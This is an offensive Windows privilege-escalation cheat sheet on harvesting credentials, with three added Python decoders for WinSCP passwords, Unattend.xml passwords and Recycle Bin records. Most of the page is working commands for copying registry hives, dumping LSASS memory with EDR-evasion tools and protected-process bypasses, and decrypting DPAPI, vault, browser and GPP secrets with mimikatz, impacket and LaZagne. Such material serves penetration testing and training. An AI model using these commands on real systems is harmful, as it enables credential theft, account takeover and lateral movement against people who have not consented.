PrivEsc - Credentials & Files
Credentials lying on the box. The most reliable Windows privesc when the privileges and services come up clean.
i. SAM, SYSTEM, SECURITY hives
The live hive files are locked while Windows is running. Need SeBackupPrivilege (Backup Operators), admin, or HiveNightmare (CVE-2021-36934) to read them from a shadow copy.
With SeBackupPrivilege (covered in PrivEsc - Tokens & Privileges ):
reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
HiveNightmare / SeriousSAM (CVE-2021-36934): any non-admin on Win10 1809+ without the August 2021 update, and only if a Volume Shadow Copy exists (restore point, backup), because the live hive stays locked even with the bad ACL:
icacls C:\Windows\System32\config\SAM
## If "BUILTIN\Users:(I)(RX)" is shown, every user has read on SAM
## Read from Volume Shadow Copies (vssadmin list shadows needs admin, so try HarddiskVolumeShadowCopy1, 2, ...):
mklink /D C:\Temp\vss \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
copy C:\Temp\vss\Windows\System32\config\SAM C:\Windows\Temp\
copy C:\Temp\vss\Windows\System32\config\SYSTEM C:\Windows\Temp\
copy C:\Temp\vss\Windows\System32\config\SECURITY C:\Windows\Temp\
## mklink /D needs SeCreateSymbolicLinkPrivilege (Administrators, or Developer Mode). Without it, use a PoC such as HiveNightmare.exe, which opens \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\config\SAM directly with CreateFile.
Parse on attacker:
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
Output gives you the local NT hashes from SAM (RID-500 Administrator is the one to PtH, see Lateral Movement; other local admins are blocked remotely by UAC token filtering unless LocalAccountTokenFilterPolicy=1), LSA secrets from SECURITY (service account passwords in cleartext, the machine account, DPAPI machine/user keys) and cached domain logons (DCC2, crack with hashcat -m 2100; they cannot be passed).
ii. LSASS dump
Creds of every logon session on the box: NT hashes always, plaintext only if WDigest is on (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest UseLogonCredential=1; off by default since 8.1/2012 R2). Needs SeDebugPrivilege (admins have it) or SYSTEM.
procdump (Microsoft-signed, often not flagged):
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
nanodump (designed for EDR evasion):
nanodump.exe --write C:\Windows\Temp\lsass.dmp
Comsvcs.dll trick (no external binary needed):
$id = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $id C:\Windows\Temp\lsass.dmp full
Or Task Manager GUI: Details -> right-click lsass.exe -> Create dump file.
Parse on attacker:
pypykatz lsa minidump lsass.dmp
## or
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
LSASS may run as a Protected Process Light (RunAsPPL): opt-in since 8.1/2012 R2, on by default on new Windows 11 22H2+ installs. Check: reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL. With PPL, user-mode handle requests beyond PROCESS_QUERY_LIMITED_INFORMATION fail, so procdump/comsvcs die with access denied; PPLdump (userland technique, mitigated by Microsoft in mid-2022) or PPLBlade are the usual bypasses. Credential Guard is a separate layer: with it enabled, domain NT hashes and TGT keys live in LSAIso and are not in the LSASS dump at all.
iii. Windows Credential Manager / Vault
Saved RDP creds, web creds, Windows logins:
cmdkey /list
Use them with runas without seeing the password:
runas /savecred /user:DOMAIN\Administrator "C:\Windows\Temp\sh.exe"
Dump cleartext via Mimikatz:
mimikatz.exe
vault::list
vault::cred /patch
Direct vault file access (per-user DPAPI-encrypted):
dir /a:h /s %userprofile%\AppData\Local\Microsoft\Vault\
dir /a:h /s %userprofile%\AppData\Local\Microsoft\Credentials\
iv. DPAPI master keys and credential files
DPAPI encrypts most user secrets. Get the master key, decrypt everything.
Master keys (one per user, GUID-named, protected by the user's password) and the credential blobs (what the Credential Manager entries above are stored as):
dir /a:h C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\
dir /a:h C:\Users\<user>\AppData\Local\Microsoft\Credentials\
Decrypt with mimikatz (need the user's password, a session as that user, or the domain DPAPI backup key from a DC). Read the blob first to learn which master key it needs, decrypt that master key, then the blob:
mimikatz.exe
dpapi::cred /in:C:\Users\u\AppData\Local\Microsoft\Credentials\HASHFILE
## note guidMasterKey, pick the file with that name under Protect\<SID>\
dpapi::masterkey /in:"C:\Users\u\AppData\Roaming\Microsoft\Protect\SID\MK" /sid:SID /password:"userpass"
## with the domain backup key instead of the password: /pvk:ntds_capi_0_<guid>.pvk
dpapi::cred /in:C:\Users\u\AppData\Local\Microsoft\Credentials\HASHFILE /masterkey:<hex key printed above>
Domain-wide DPAPI backup key, dump from a DC (needs Domain Admin). It decrypts any domain user's master keys without their password and is never rotated:
impacket-dpapi backupkeys -t 'DOMAIN/Administrator:Password@DC01' --export
## or
mimikatz: lsadump::backupkeys /system:DC01 /export
v. Saved app credentials
PuTTY saved sessions (HostName, UserName, PublicKeyFile path and ProxyPassword in clear text; PuTTY never stores the SSH password itself):
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
PuTTY private keys (.ppk):
dir /s /b C:\Users\*.ppk
WinSCP saved sessions:
reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
## The Password value is obfuscated (byte-wise complement/XOR with a fixed constant, keyed only by username+hostname), not encrypted. Decode with:
## https://github.com/anoopengineer/winscppasswd
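The WinSCP scheme is simple enough to decode by hand from the three registry values, so here is an offline decoder. This is an added example, not code from the page or from WinSCP: it reimplements the documented obfuscation (each byte stored as two hex chars of ~(byte ^ 0xA3); layout flag, dummy, length, shift, filler, then username+hostname+password; padded to 50 bytes), parses the output of reg query ... /s, and includes an encoder only to construct the sample value. The session, host, user and password in the sample are made up.

```python
# Added example (not from the page or WinSCP): offline decoder for the WinSCP
# "Password" registry value, fed from the output of
#   reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
# The sample registry output and credentials below are constructed for the demo.
import re
from urllib.parse import unquote

PW_MAGIC = 0xA3   # constant from WinSCP's simple password scheme
PW_FLAG = 0xFF    # first byte of the current layout: flag, dummy, length, shift, filler, key+password
PW_MAXLEN = 50    # blobs are padded with random bytes to 50 bytes (100 hex chars)


def _dec_byte(hexstr: str, pos: int) -> tuple[int, int]:
    """Decode one byte from the two hex chars at pos; returns (byte, next pos)."""
    val = int(hexstr[pos:pos + 2], 16)
    return (~(val ^ PW_MAGIC)) & 0xFF, pos + 2


def _enc_byte(b: int) -> str:
    return f"{(~b ^ PW_MAGIC) & 0xFF:02X}"


def winscp_decrypt(hostname: str, username: str, password_hex: str) -> str:
    key = (username + hostname).encode("utf-8")   # the only "key": a known prefix
    flag, pos = _dec_byte(password_hex, 0)
    if flag == PW_FLAG:
        _, pos = _dec_byte(password_hex, pos)        # dummy byte
        length, pos = _dec_byte(password_hex, pos)
    else:
        length = flag                                 # legacy layout: first byte is the length
    shift, pos = _dec_byte(password_hex, pos)
    pos += shift * 2                                  # skip `shift` random filler bytes
    plain = bytearray()
    for _ in range(length):
        b, pos = _dec_byte(password_hex, pos)
        plain.append(b)
    if flag == PW_FLAG:
        if not plain.startswith(key):
            raise ValueError("username+hostname do not match this blob")
        plain = plain[len(key):]
    return plain.decode("utf-8", errors="replace")


def winscp_encrypt(hostname: str, username: str, password: str, shift: int = 3) -> str:
    """Inverse of winscp_decrypt, used here only to build test data (WinSCP uses random filler)."""
    data = (username + hostname + password).encode("utf-8")
    if len(data) >= PW_MAXLEN:
        raise ValueError("the simple scheme only covers key+password under 50 bytes")
    out = [_enc_byte(PW_FLAG), _enc_byte(0), _enc_byte(len(data)), _enc_byte(shift)]
    out += [_enc_byte(0x41 + i) for i in range(shift)]
    out += [_enc_byte(b) for b in data]
    out += [_enc_byte(0)] * (PW_MAXLEN - len(out))
    return "".join(out)


def decrypt_reg_query(text: str) -> list[dict]:
    """Parse `reg query ... /s` output (key line, then indented NAME TYPE DATA lines)."""
    sessions, current = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = {"session": unquote(line.rsplit("\\", 1)[-1])}  # names are %XX-escaped
            sessions.append(current)
            continue
        m = re.match(r"\s+(\S+)\s+REG_\w+\s+(.*)$", line)
        if m and current is not None:
            current[m.group(1)] = m.group(2).strip()
    result = []
    for s in sessions:
        if "Password" not in s:
            continue
        host, user = s.get("HostName", ""), s.get("UserName", "")
        result.append({"session": s["session"], "host": host, "user": user,
                       "password": winscp_decrypt(host, user, s["Password"])})
    return result


# Constructed sample: what reg query prints for one saved session plus the defaults key.
SAMPLE_REG_QUERY = "\n".join([
    r"HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\prod%20backup",
    "    HostName    REG_SZ    ftp.example.test",
    "    PortNumber    REG_DWORD    0x16",
    "    UserName    REG_SZ    svc_backup",
    "    Password    REG_SZ    " + winscp_encrypt("ftp.example.test", "svc_backup", "S3cret!Backup"),
    "",
    r"HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Default%20Settings",
    "    FSProtocol    REG_DWORD    0x0",
])

if __name__ == "__main__":
    for c in decrypt_reg_query(SAMPLE_REG_QUERY):
        print(f"{c['session']}: {c['user']}@{c['host']} -> {c['password']}")
```

Real blobs start with A35C (flag 0xFF and dummy 0x00 after the transform), which is a quick way to recognise them in an export. If the decoder raises on the key check, the HostName or UserName value was edited after the password was saved, or the session was copied from another entry.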
MobaXterm saved sessions (also check %appdata%\MobaXterm\MobaXterm.ini):
dir /s /b "%appdata%\MobaXterm\MobaXterm.ini" "%userprofile%\Documents\MobaXterm*" 2>nul
type "%userprofile%\Documents\MobaXterm\MobaXterm.ini" 2>nul
## Decrypt with MobaXtermPasswordDecrypt (needs the master password if one was set)
FileZilla (site passwords are plain base64 in <Pass encoding="base64">):
type "%appdata%\FileZilla\sitemanager.xml" 2>nul
type "%appdata%\FileZilla\recentservers.xml" 2>nul
OpenVPN:
dir /s /b C:\Users\*.ovpn
KeePass DB files:
dir /s /b C:\Users\*.kdbx C:\Users\*.kdb 2>nul
Crack with hashcat (-m 13400 covers KDBX 3.x with AES-KDF; KDBX 4 with Argon2 is not handled by that mode). Look for a key file next to the database first, it may open without any password:
keepass2john db.kdbx > kp.hash
## keepass2john -k keyfile.key db.kdbx if a key file is used
hashcat -m 13400 kp.hash "$WL"
vi. Browser saved credentials
Chrome / Edge (Chromium-based, same format):
dir "%localappdata%\Google\Chrome\User Data\Default\Login Data" ## SQLite, password column encrypted
dir "%localappdata%\Microsoft\Edge\User Data\Default\Login Data"
Since Chrome 80 the logins are AES-256-GCM under a key kept in "User Data\Local State" (os_crypt.encrypted_key), and that key is DPAPI-protected; older profiles used DPAPI directly on each password. Either way you need the user's DPAPI master key (their password, a session as them, or the domain backup key). Extract with SharpChrome (SharpDPAPI) or LaZagne:
LaZagne.exe browsers
LaZagne.exe all ## kitchen sink
Firefox stores creds in logins.json, decrypt with firefox_decrypt.py:
dir /a:h "%appdata%\Mozilla\Firefox\Profiles\*\logins.json"
dir /a:h "%appdata%\Mozilla\Firefox\Profiles\*\key4.db"
vii. Unattended install files
GPP, sysprep, MDT, SCCM dump passwords into XML files that admins forget to delete:
dir /s /b C:\Unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml 2>nul
dir /s /b C:\Windows\System32\sysprep\sysprep.xml C:\Windows\System32\sysprep\sysprep.inf 2>nul
dir /s /b C:\Windows\system32\sysprep\Panther\setupact.log 2>nul
findstr /si pass *.xml *.ini *.txt *.config 2>nul
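Unattend and sysprep answer files do not store the password as-is when PlainText is false; they store Base64(UTF-16LE(password + element name)), so a raw base64 decode leaves "Password" or "AdministratorPassword" glued to the end. The decoder below is an added example, not code from the page: it walks the XML, decodes every AdministratorPassword and Password element, strips the element-name suffix (and flags values where the suffix is absent instead of guessing), and reports which account each belongs to. The sample answer file and its passwords are constructed for the demo.

```python
# Added example (not from the page): decode the password fields of an
# Unattend.xml / sysprep answer file. For <PlainText>false</PlainText>,
# Windows stores Base64(UTF-16LE(password + element name)): an
# <AdministratorPassword> value ends in "AdministratorPassword", a <Password>
# value in "Password". The sample answer file below is constructed for the demo.
import base64
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip the urn:schemas-microsoft-com:unattend namespace from a tag."""
    return tag.rsplit("}", 1)[-1]


def encode_unattend_value(password: str, element: str) -> str:
    """What Windows SIM writes for PlainText=false (used here to build the sample)."""
    return base64.b64encode((password + element).encode("utf-16-le")).decode("ascii")


def decode_unattend_value(value: str, element: str) -> tuple[str, bool]:
    """Return (password, suffix_verified). A missing suffix means the value was
    not produced the normal way; report the raw string rather than guess."""
    raw = base64.b64decode(value).decode("utf-16-le", errors="replace")
    if raw.endswith(element):
        return raw[: -len(element)], True
    return raw, False


def extract_unattend_passwords(xml_text: str) -> list[dict]:
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag not in ("AdministratorPassword", "Password"):
            continue
        children = {_local(c.tag): (c.text or "").strip() for c in elem}
        if "Value" not in children:
            continue
        if children.get("PlainText", "").lower() == "true":
            password, verified = children["Value"], True
        else:
            try:
                password, verified = decode_unattend_value(children["Value"], tag)
            except ValueError:            # not base64 at all: keep it, but unverified
                password, verified = children["Value"], False
        parent = parent_of.get(elem)
        if tag == "AdministratorPassword":
            account = "Administrator"
        else:                             # LocalAccount has <Name>, AutoLogon has <Username>
            siblings = {_local(c.tag): (c.text or "").strip() for c in parent} if parent is not None else {}
            account = siblings.get("Name") or siblings.get("Username") or "?"
        found.append({"section": _local(parent.tag) if parent is not None else "",
                      "account": account, "password": password, "verified": verified})
    return found


# Constructed sample in the shape Windows SIM produces (passwords are made up).
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend"
          xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64"
               publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS">
      <UserAccounts>
        <AdministratorPassword>
          <Value>{encode_unattend_value("Adm1n!Pass", "AdministratorPassword")}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount wcm:action="add">
            <Name>deploy</Name>
            <Group>Administrators</Group>
            <Password>
              <Value>{encode_unattend_value("Depl0y#2021", "Password")}</Value>
              <PlainText>false</PlainText>
            </Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
      <AutoLogon>
        <Enabled>true</Enabled>
        <Username>deploy</Username>
        <Password>
          <Value>Depl0y#2021</Value>
          <PlainText>true</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for c in extract_unattend_passwords(SAMPLE_UNATTEND):
        flag = "" if c["verified"] else " (suffix missing, raw value)"
        print(f"{c['section']}/{c['account']}: {c['password']}{flag}")
```

Point it at the paths listed above (C:\Windows\Panther\Unattend.xml and friends); the same element names appear in MDT/SCCM-generated files.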
GPP cpassword (when host pulls policy from SYSVOL):
findstr /S /I cpassword \\%USERDNSDOMAIN%\sysvol\%USERDNSDOMAIN%\Policies\*.xml
## Or local cached:
findstr /S /I cpassword "C:\ProgramData\Microsoft\Group Policy\History\*.xml"
Decrypt cpassword (AES key is public):
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
viii. PowerShell history (recap from Local Enum )
Every command typed in PowerShell with PSReadLine gets logged. Common cred source:
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA SilentlyContinue | %{ Write-Host $_.FullName; Get-Content $_.FullName }
ix. Application configs and web.config
ASP.NET applications often have DB connection strings in web.config:
dir /s /b C:\inetpub\web.config 2>nul
findstr /si "connectionString password pwd" C:\inetpub\*.config 2>nul
Decrypt protected sections of web.config (requires being the app pool identity):
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" C:\inetpub\wwwroot\app
App.config for .NET desktop apps:
dir /s /b "C:\Program Files\*.config" "C:\Program Files (x86)\*.config" 2>nul | findstr /v /i Microsoft
x. Kerberos cached tickets
Tickets live in LSASS, one cache per logon session: klist only shows your own, and dumping another session's TGT needs admin/SYSTEM. Rubeus:
klist
Rubeus.exe triage
Rubeus.exe dump /luid:<LUID from triage> /service:krbtgt /nowrap
Save and use elsewhere, see AD MOC -> Pass-the-Ticket.
xi. SSH on Windows
OpenSSH client and server are built-in on modern Windows. Keys and config are often present:
dir /a /s /b C:\Users\id_* 2>nul
type %userprofile%\.ssh\known_hosts
type %userprofile%\.ssh\config
## Server side: host keys and administrators_authorized_keys (only Administrators/SYSTEM can write it)
dir C:\ProgramData\ssh\ 2>nul
xii. Outlook PST and OST
User’s email archive, often contains password reset emails, internal docs with creds:
dir /s /b "%localappdata%\Microsoft\Outlook\*.ost" "%localappdata%\Microsoft\Outlook\*.pst" "%userprofile%\Documents\Outlook Files\*.pst" 2>nul
Read offline with libpff, readpst, or open in Outlook on attacker.
xiii. Backup files everywhere
Backup files are the goldmine, admins always forget them:
dir /s /b C:\*.bak C:\*.backup C:\*.old C:\*.orig 2>nul
where /r C:\ *.bak *.old *.config.bak 2>nul
Pay attention to C:\Windows\repair\ (SAM/SYSTEM copies on old NT/XP-era builds), C:\Windows\System32\config\RegBack\ (hive backups; 0-byte files on Win10 1803+ unless re-enabled, real hives on older builds) and C:\Users\*\Documents\.
xiv. Recycle Bin
Each user's bin is C:\$Recycle.Bin\<SID>\, ACL'd to that user plus Administrators/SYSTEM, so other users' content needs admin; the SID directory names alone tell you who has deleted things:
dir /a /s C:\$Recycle.Bin 2>nul
Entries come in pairs: $R<id> is the content, $I<id> the metadata (original path, size, deletion time). Map SIDs to names with: wmic useraccount get name,sid
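The mangled names are only opaque until you read the $I records, which are tiny and fixed-format. The parser below is an added example, not code from the page: it decodes both $I layouts (version 1, Vista to 8.1: u64 version, u64 size, u64 deletion FILETIME, fixed 520-byte UTF-16LE path; version 2, Windows 10+: same header, then a u32 character count and the path), pairs each $I with its $R file, and turns a per-SID listing into "who deleted what, when". The records and SIDs in the sample are constructed in memory; on a box you would read the $I files from the listing above.

```python
# Added example (not from the page): parse the $I<id> metadata records that
# Windows writes beside each $R<id> file in C:\$Recycle.Bin\<SID>\.
# Layout: u64 version, u64 original size, u64 deletion FILETIME, then either a
# fixed 520-byte UTF-16LE path (version 1, Vista to 8.1) or a u32 character
# count followed by the UTF-16LE path (version 2, Windows 10+).
# The records below are constructed in memory for the demo.
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
V1_PATH_BYTES = 520  # MAX_PATH (260) UTF-16 code units


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME = 100ns ticks since 1601-01-01 UTC (sub-microsecond part dropped)."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return ((delta.days * 86400 + delta.seconds) * 1_000_000 + delta.microseconds) * 10


def parse_dollar_i(data: bytes) -> dict:
    if len(data) < 24:
        raise ValueError("record shorter than the 24-byte $I header")
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw = data[24:24 + V1_PATH_BYTES]
        path = raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)   # includes the terminating null
        raw = data[28:28 + nchars * 2]
        if len(raw) != nchars * 2:
            raise ValueError("path truncated: record shorter than its declared length")
        path = raw.decode("utf-16-le", errors="replace").rstrip("\x00")
    else:
        raise ValueError(f"unknown $I version {version}")
    return {"version": version, "size": size, "deleted": filetime_to_datetime(ft), "path": path}


def build_dollar_i(path: str, size: int, deleted: datetime, version: int = 2) -> bytes:
    """Inverse of parse_dollar_i; only used here to construct sample records."""
    header = struct.pack("<QQQ", version, size, datetime_to_filetime(deleted))
    encoded = (path + "\x00").encode("utf-16-le")
    if version == 1:
        if len(encoded) > V1_PATH_BYTES:
            raise ValueError("version 1 paths are limited to 260 characters")
        return header + encoded.ljust(V1_PATH_BYTES, b"\x00")
    return header + struct.pack("<I", len(path) + 1) + encoded


def r_file_for(i_name: str) -> str:
    """$I1A2B3C.txt holds the metadata for $R1A2B3C.txt."""
    if not i_name.startswith("$I"):
        raise ValueError("not a $I record name")
    return "$R" + i_name[2:]


def triage_bin(sid_dirs: dict) -> list[dict]:
    """sid_dirs = {SID: {"$Ixxxx.ext": record bytes, ...}}; one row per deleted file, oldest first."""
    rows = []
    for sid, files in sid_dirs.items():
        for name, data in files.items():
            if not name.startswith("$I"):
                continue
            rows.append({"sid": sid, "content_file": r_file_for(name), **parse_dollar_i(data)})
    return sorted(rows, key=lambda r: r["deleted"])


# Constructed sample: two users' bins, one record in each layout.
SAMPLE_BIN = {
    "S-1-5-21-1111-2222-3333-1105": {
        "$I3F9K2Q.txt": build_dollar_i(r"C:\Users\alice\Desktop\vpn-creds.txt", 1337,
                                       datetime(2021, 7, 20, 12, 0, tzinfo=timezone.utc)),
        "$R3F9K2Q.txt": b"<file content lives here>",
    },
    "S-1-5-21-1111-2222-3333-500": {
        "$IB7X1PZ.kdbx": build_dollar_i(r"C:\Users\Administrator\Documents\it.kdbx", 40960,
                                        datetime(2021, 6, 1, 8, 30, tzinfo=timezone.utc), version=1),
    },
}

if __name__ == "__main__":
    for r in triage_bin(SAMPLE_BIN):
        print(f"{r['deleted']:%Y-%m-%d %H:%M} {r['sid']} {r['content_file']} <- {r['path']} ({r['size']} B)")
```

Sorting by deletion time is what makes this useful on a shared box: the last few deletions by the RID-500 user are usually the interesting ones, and the original path tells you whether the $R file is worth copying out.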
xv. Memory dumps and crash dumps
Crash dumps contain whatever the crashed process had in memory, LSASS included if it was the victim; a kernel dump (MEMORY.DMP) contains all of physical memory:
dir /s C:\Windows\Minidump\
dir C:\Windows\MEMORY.DMP
dir /s /b "%localappdata%\CrashDumps\*.dmp" 2>nul ## WER user-mode dumps
Read with WinDbg (mimilib and !mimikatz for full memory dumps), pypykatz for LSASS minidumps, or strings for cred fragments.
xvi. After cred, where to use it
- Local user privesc -> runas or RDP
- Lateral to another host -> Lateral Movement
- AD domain -> AD MOC
- Cloud creds -> Cloud MOC